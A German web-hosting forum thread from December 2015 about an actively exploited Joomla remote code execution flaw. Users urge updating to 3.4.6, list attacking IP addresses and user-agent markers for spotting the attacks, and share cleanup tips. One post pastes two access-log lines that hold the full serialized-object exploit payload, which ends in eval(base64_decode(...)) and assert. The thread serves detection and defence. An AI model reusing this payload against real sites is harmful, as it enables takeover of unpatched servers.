Neue Joomla-Sicherheitslücke -> Dringendes Update auf 3.4.6

  • Hi,


    wer es noch nicht gelesen hat. Gestern abend wurde ein dringendes Update für Joomla 3.4.5 veröffentlicht. Es sind auch alle alten 2.5 und 1.5 Versionen betroffen. Diesmal scheint wirklich schnelles Handeln angesagt, da die Lücke bereits seit dem 12.12.15 ausgenutzt wird:


    Joomla-Version 3.4.6 stopft kritische Sicherheitslücke | heise online


    Weitere hilfreiche Infos hier:


    Critical 0-day Remote Command Execution Vulnerability in Joomla - Sucuri Blog



    Laut dem letzteren Artikel kamen die bisher bekannten Angriffe von den IPs:


    74.3.170.33
    146.0.72.83
    194.28.174.106


    Weitere IPs die den Exploit bereits nutzen sind:
    5.135.158.101
    5.196.1.129
    5.196.72.199
    5.196.72.207
    5.79.68.161
    5.9.36.66
    31.220.45.6
    35.0.127.52
    37.130.227.133
    37.187.129.166
    37.48.80.101
    37.48.80.73
    37.48.81.27
    46.165.230.5
    46.183.221.231
    46.45.137.71
    85.245.242.72
    89.248.160.156
    89.248.167.141
    104.232.3.33
    162.221.200.51
    178.20.55.16
    207.244.70.35
    212.117.180.21
    (ich update diese Liste jetzt nicht mehr. Wer sein Joomla bis jetzt nicht aktualisiert hat, hat denke ich eh verloren, denn mein eigenes Logfile ist inzwischen auch voll von Angriffen, aber der erste war heute um 11:49)



    und die Zugriffe enthalten im Useragentfeld den Begriff JDatabaseDriverMysqli oder es kam auch einfach O: darin vor.



    Ich hab meine Logs mal durchsucht und keine erfolgreichen Angriffe entdeckt...



    Alles Gute
    Oliver

  • Habe zum Glück schon gestern upgedated,
    habe heute schon zwei Angriffe in den Logs auf meinem Server gesehen.


    Sind zwei unabhängige Joomla 2.5 Installationen.


    Code
    1. 85.245.242.72 - - [15/Dec/2015:02:32:43 +0100] "GET / HTTP/1.1" 200 2270 "http://domain1.tld/" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\x9d\x8c\x86"
    2. 178.20.55.16 - - [15/Dec/2015:02:34:24 +0100] "GET / HTTP/1.1" 200 4511 "http://domain2.tld/" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\x9d\x8c\x86"


    Also schnell updaten - die Angriffe finden bereits statt. Auch auf nicht wirklich bekannte Websites.


    EDIT:
    Ich konnte nun feststellen, dass bei beiden Seiten das Joomla-Generator-Tag nicht entfernt wurde.
    Deshalb sollte man in der index.php-Datei des Templates folgende Zeile einfügen:

    PHP
    1. $this->setGenerator(null);


    Lg
    Fürni

  • Auf einem noch existierenden 2.5-Joomla habe ich den Patch eingespielt.

    9 von 10 Stimmen in meinem Kopf sagen ich bin nicht verrückt, die letzte summt ständig die Melodie von Tetris.

    The post was edited 2 times, last by RHA ().

  • Hatte doch ein Kunde auf meinem Server noch ein Joomla 3.2.x installiert X( (ja, das darf nicht mehr als aktives System eingesetzt werden)


    Zum Glück habe ich das gestern Abend noch bemerkt und sofort reagiert, und Sein Glück dass ich eh gerade einen Server-Umzug durchführe. Also Seite gesperrt (per .htaccess), älteste Sicherung mit letztem Stand auf neuen Server installiert, und sofort ein Update auf 3.4.6 gemacht. Bei einem Blick in die LOGs des alten Servers durfte ich natürlich ein paar Angriffe feststellen (ca. eine Handvoll). Sonst habe ich keine Auffälligkeiten finden können (weitere Logs, Datenbank, User, usw. kontrolliert).


    Sollte man noch nach bestimmten Dingen schauen um sicher zu gehen?

    9 von 10 Stimmen in meinem Kopf sagen ich bin nicht verrückt, die letzte summt ständig die Melodie von Tetris.

  • Hatte doch ein Kunde auf meinem Server noch ein Joomla 3.2.x installiert X( (ja, das darf nicht mehr als aktives System eingesetzt werden)


    Zum Glück habe ich das gestern Abend noch bemerkt und sofort reagiert, und Sein Glück dass ich eh gerade einen Server-Umzug durchführe. Also Seite gesperrt (per .htaccess), älteste Sicherung mit letztem Stand auf neuen Server installiert, und sofort ein Update auf 3.4.6 gemacht. Bei einem Blick in die LOGs des alten Servers durfte ich natürlich ein paar Angriffe feststellen (ca. eine Handvoll). Sonst habe ich keine Auffälligkeiten finden können (weitere Logs, Datenbank, User, usw. kontrolliert).


    Sollte man noch nach bestimmten Dingen schauen um sicher zu gehen?


    Servus,


    ist dir das durch Zufall aufgefallen? Ich suche derzeit nach einer automatisierten Lösung meinen Server regelmäßig auf alte CMS Systeme und Malware zu prüfen.


    Hat da jemand eine Idee? Auf meinem Server läuft Plesk!


    VG Fisi

  • Solange es nur um Joomla geht, gibts bei HowToForge ein Skript, um veraltete Joomla-Installationen zu finden:


    How to find outdated joomla versions on your server to reduce the risk of being hacked



    Da das Prinzip des Skripts relativ einfach ist, gibt es vermutlich auch ähnliche Versionen für andere CMS, weil das Skript vergleicht einfach die Versionsnummern in .php Dateien mit einer im Skript fest kodierten Vorgabe...

  • Nein, ist mir nicht durch Zufall aufgefallen. Ich habe bewusst die Kundenbereiche nach Joomla-Installationen durchsucht, bzw. Kunden befragt.

    9 von 10 Stimmen in meinem Kopf sagen ich bin nicht verrückt, die letzte summt ständig die Melodie von Tetris.